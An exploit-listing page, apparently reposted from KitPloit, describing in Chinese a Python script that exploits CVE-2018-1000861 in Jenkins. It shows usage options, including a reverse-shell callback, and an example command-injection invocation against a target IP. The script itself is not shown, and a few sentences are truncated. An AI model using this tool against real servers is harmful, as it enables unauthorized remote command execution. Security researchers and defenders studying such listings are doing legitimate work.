Sploitus

Exploit for CVE-2018-1000861

kitploit · 2026-08-25

Exploit Code

MARKDOWN37 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-SMOKEINTHESHELL-CVE-2018-1000861
# CVE-2018-1000861

用于利用CVE-2018-1000861的简单脚本,使用Python 3编写

### 使用说明:

root@kitploit:~
    
    
    usage: exploit.py [-h] -u URL [-c CMD] [-r] [-i IP] [-p PORT] [-v]
    
    options:
      -h, --help            显示帮助信息并退出
      -u URL, --url URL     目标Jenkins服务器
      -c CMD, --cmd CMD     要执行的命令
      -r, --revshell        执行反弹shell
      -i IP, --ip IP        反弹shell回调的IP地址
      -p PORT, --port PORT  反弹shell回调的端口
      -v, --verbose         详细输出
    

### 示例:

root@kitploit:~
    
    
    python exploit.py -u http://192.168.1.20 -c 'ping 192.168.1.10'
    

### 注意事项:

  * 此工具不尝试验证目标是否易受攻击。它所做的只是将一个shell命令注入到Java类中。
  * 执行的shell命令不会返回输出。您需要有一种方法来验证命令是否执行(例如ping + tcpdump),或者使用反弹shell。
  * 此漏洞影响Jenkins的Linux和Windows安装,其中 。在运行此脚本之前,您应尝试验证目标操作系统(例如通过ICMP TTL或可用服务)。
  * 该脚本 _应该_ 适用于Linux和Windows。
  * 反弹shell模块(`-r`、`-i`、选项)尚未实现。